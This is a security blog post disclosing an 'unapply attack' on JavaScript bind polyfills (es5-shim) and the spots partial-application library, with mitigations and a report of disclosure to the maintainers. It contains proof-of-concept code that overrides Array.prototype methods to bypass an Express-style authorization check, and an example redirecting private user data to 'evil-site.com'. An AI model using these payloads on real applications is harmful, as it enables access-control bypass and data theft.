May 27 2015

Unapply attack

Compromise functions private to closures via partially applied references.

TL;DR We can exploit the partially applied functions to "free" the bound arguments and run the original function with new set of unexpected runtime arguments. This is a potentially serious security hole, as it can affect various browsers and the popular server middleware projects like ExpressJs. It effectively removes the assumption that functions inside closures are private to the closure and cannot be accessed from the outside.

Review

The exploit uses two basic JavaScript concepts: closures and partial application.

Closures

You can review closures by reading this blog post. In essence, JavaScript does not have the keyword private. Instead it restricts variable's visibility to the function that declares it. This is commonly used to create variables that cannot be accessed from the outside

var four = (function closure() {
  var two = 2; // private to "closure"
  return 4;
}());
four; // 4
two; 
// ReferenceError: two is undeclared

Partial application review

You can review JavaScript concept of context binding and partial application by reading this blog post.

JavaScript ES5 includes a native method for binding the values to the function's arguments, and producing a new function. For example

function add(a, b) { return a + b; }
var add2 = add.bind(null, 2);
var add2to5 = add.bind(null, 2, 5);
add2(10); // 12
add2to5(); // 7

We assume that given only a partially applied function reference, like add2 or add2to5, there is no way to get to the original function reference add. This can be used to conveniently hide the original unprotected code inside a closure, exporting only a partially applied function that is safe for the outside users to call.

Here is an example of a closure with an unprotected function and exported partially bound reference.

// take a simple function add, 
// make it private to a closure
// and return partially applied version
var add2 = (function() {
    function add(a, b) {
        if (a === 42) {
            throw new Error('Oh no, first argument is 42!');
        }
        return a + b;
    }
    return add.bind(null, 2);
}());
// one can safely use add2
console.log(add2(3)); // 5

Because add is inside the anonymous closure, we assume there is no way to call it from the outside, except via the returned partially applied reference. This is important in this case because as an example add has an undesired behavior: it crashes if the first argument has value 42. The programmer assumes that add will always run with first argument equal to 2. Yet, this assumption is invalid as I will show next.

Polyfills

The native Function.prototype.bind method used above is part of the modern ES5 standard. There are a lot of polyfills that provide this method for legacy reasons. One can easily write a bind polyfill, here is one suggestion that does not implement the context binding, only the partial argument application.

// simple bind polyfill
function bind(fn) {
  var prev = Array.prototype.slice.call(arguments, 1);
  return function bound() {
    var curr = Array.prototype.slice.call(arguments, 0);
    var args = Array.prototype.concat.apply(prev, curr);
    return fn.apply(null, args);
  };
}

The main principle is to combine the values given in the original call (the prev array) with the values given at the later runtime call (the curr array). One can use the custom bind similarly to the native one

1 2	var add2 = bind(add, 2); add2(3); // 5

A typical polyfill used in many projects is es5-shim downloaded more than 100k times every month. The es5-shim library has its own bind function. Its argument combination code is very similar to the simple "bind" code example from above:

// other stuff
return target.apply(
  that,
  args.concat(array_slice.call(arguments))
);

Attacking polyfills

The goal of the attack is to run the original function instance, replacing the previously bound arguments with the new runtime values. Because the original function might rely on its privacy, it might NOT validate the inputs, assuming that some of them will always be bound to the "safe" values.

Here is how one can achieve this. Let us take a look at the simple bind polyfill again. Suppouse we inspect the source of the bound function add2. We will see just the code returned by the polyfill.

var add2 = bind(add, 2);
console.log(add2.toString());
/*
function bound() {
  var curr = Array.prototype.slice.call(arguments, 0);
  var args = Array.prototype.concat.apply(prev, curr);
  return fn.apply(null, args);
}
*/

Typically, I would attack a method like this by faking its lexical scope, but in this scope there are two variables accessed via the lexical scope: prev and fn. Since I want to use the original fn function while replacing the prev, this technique does not work.

Yet, there is a part of the code that I can modify easily: the Array.prototype.concat call that combines the previously bound values prev with the runtime values curr. I (the attacker) can simply overwrite the Array.prototype.concat call to discard the prev array entirely! Here is one attack method that works against both the simple bind and es5-shim functions

// unapply-attack
function unapplyAttack() {
  var concat = Array.prototype.concat;
  Array.prototype.concat = function replaceAll() {
    Array.prototype.concat = concat; // restore the correct version
    var curr = Array.prototype.slice.call(arguments, 0);
    var result = concat.apply([], curr);
    return result;
  };
}

An attacker uses the above unapplyAttack function like this

// attack example
var add2 = (function () {
  function add(a, b) {
    if (a === 42) {
      throw new Error('Oh no, first argument is 42!');
    }
    return a + b;
  }
  return add.bind(null, 2);
}());
console.log(add2(3)); // 5
unapplyAttack();
add2(42, 10);
// ERROR!

Again, just to stress the important point: the attack does not rely on calling the toString() - only on inspecting the bind implementation and changing the Array.prototype method(s) to change the behavior when combining previously bound values with the new ones.

Another attack example

Suppose we send the user's data to the server

var sendUserData = (function () {
  var serverUrl = 'https://...'; // injected by the server
  return $http.post.bind($http, serverUrl, privateUserData);
}());
// expected behavior
sendUserData();
// attack behavior - only change first bound value
unapplyAttack();
send('http://evil-site.com');

One can attack even the modern ES5 engines in 3 steps

delete the native Function.prototype.bind
load the es5-shim (which many projects do for legacy reasons)
execute the unapplyAttack

// replace v8's native bind with es5-shim version
delete Function.prototype.bind;
require('es5-shim');
var unapplyAttack = require('./unapply-attack');
// execute the attack whenever possible

Attacking Express.js

The middleware server stacks in the Express.js can be attacked if the programmers used partial application to remove the routing boilerplate. Typically, there is a router that executes the middleware functions in order, unless a function returned false. For example, let us have a "server" that only allows the restricted functions to run if the user is logged in and authorized. You can see the "server" code in server.js

The partial application used in this example is a simple placeholder binder spots

similar to now common functions in the popular libraries like lodash#partial and Ramda#partial.

// exporting partially applied authorization routing function
var route = (function protectServer() {
  ...
  function isLoggedIn() { ... }
  function isAuthorized() { ... }
  ...
  var S = require('spots');
  var isValidUser = S(router, S, isLoggedIn, isAuthorized);
  return isValidUser;
}());
function restricted() {
  console.log('running restricted action');
}
route('/foo', restricted); // not allowed

Unless the function isLoggedIn and isAuthorized return true, the restricted function should never run. But this is only true if the attacker can NOT replace the bound values via the route reference. This is simple for the spots library, we can inspect the relevant source code to see how it places the runtime arguments into the placeholder items

// part of spots.js that combines previous "bound" and current values
var combinedArgs = [];
args.forEach(function (arg) {
  if (arg === spots) {
    combinedArgs.push(moreArgs.shift());
  } else {
    combinedArgs.push(arg);
  }
});

Here is the attack

function unapplyAttack() {
  var S = require('spots');
  var forEach = Array.prototype.forEach;
  Array.prototype.forEach = function sendSpots(cb) {
    var k;
    for (k = 0; k < this.length; k += 1) {
      cb(S, k, this);
    }
    Array.prototype.forEach = forEach; // restore correct version
  };
}
unapplyAttack();
function allow() {
  return true;
}
route('/foo', allow, allow, restricted); 
// this replaces all previous values by faking the spots comparison
// running restricted action

I am not sure if such placeholder trick is possible for the lodash library. The value combinator in that library uses plain indices to combine the arrays, without calling the prototype methods, see the wrapper code.

Preventing the unapply attacks

There are steps that both library authors and users can take to stop unapply-style attacks.

From the user's (website author) perspective I only see one solution to these attacks: freezing the built-in prototypes like Array.prototype, Function.prototype, Object.prototype before loading any other code (like trusted libraries or 3rd party code). For example:

// prevent the second attack
unapplyAttack();
console.log(add2(10, 3)); // 13
Object.freeze(Array.prototype);
unapplyAttack();
console.log(add2(10, 3)); // 12

As far as I see, unless one can show a very convincing use case, modifying the built-in prototypes should not be possible. I suggest freezing the prototypes after loading the system / shim JavaScript libraries but before loading any of the application-specific or 3rd party plugin code.

The library authors can take steps to lessen the chance of the attack in a couple of ways. One, keep a reference to the original (hopefully uncompromised) methods used to combine arguments.

// inside the shim library
var concat = Array.prototype.concat;
function bind(fn) {
  ...
  // use the original / non-compromised concat
  var args = concat.apply(prev, curr);
  return fn.apply(null, args);
}

Second, instead of using methods to combine previously bound / runtime arguments, use plain for loops, which would be harder to change externally

// inside the shim library
function bind(fn) {
  var args = prev;
  for (var k = 0; k < arguments.length; k += 1) {
    args[prev.length + k] = arguments[k];
  }
  return fn.apply(null, args);
}

Conclusion

JavaScript is a wonderful and flexible language, but some malicious code can use the language's prototype methods to break the expectation of "privacy" inside the closures. It will take more than just relying on the original Function.prototype.bind in all cases; modern applications use other styles of partial application using client-space implementations: partial application from the right, position index application, application with placeholders and application by name. It is up to the library's authors to provide reasonably safe implementations, and up to the user to be vigilant against loading malicious code.

Finally, I guess this attack can be extended to rebinding the original function to a different context.

Update 1

After I contacted the es5-shim maintainers, the bind polyfill has been made to be more robust to messing with the Array.prototype.concat method, see the change.

Update 2

I wrote small library to freeze the common prototypes before loading untrusted 3rd party code. Hope that this is enough to prevent these attacks.

index.html

<script src="//cdn/jquery.js"></script>
<script src="//cdn/angular.js"></script>
<script src="dist/freeze-prototypes.js"></script>
<script src="<your app code>"></script>
<script src="<untrusted 3rd party code>"></script>

See freeze-prototypes

Update 3

A lot of feedback I have received for this blog post focuses in my opinion on the wrong aspect. Yes, the attacker would need to run malicious code. Yes, JavaScript is a dynamic language. But the problem is that by using 3rd party code, unreviewed, we trust that code too much. In essence we are saying that if we keep the door locked, we don't need a safe inside the house. The privacy mechanism the closures give us is like a safe. By allowing 3rd party code to modify prototypes we are removing the safe's back wall!

Better world by better software

Gleb Bahmutov PhD

Our planet 🌏 is in danger

Act today: what you can do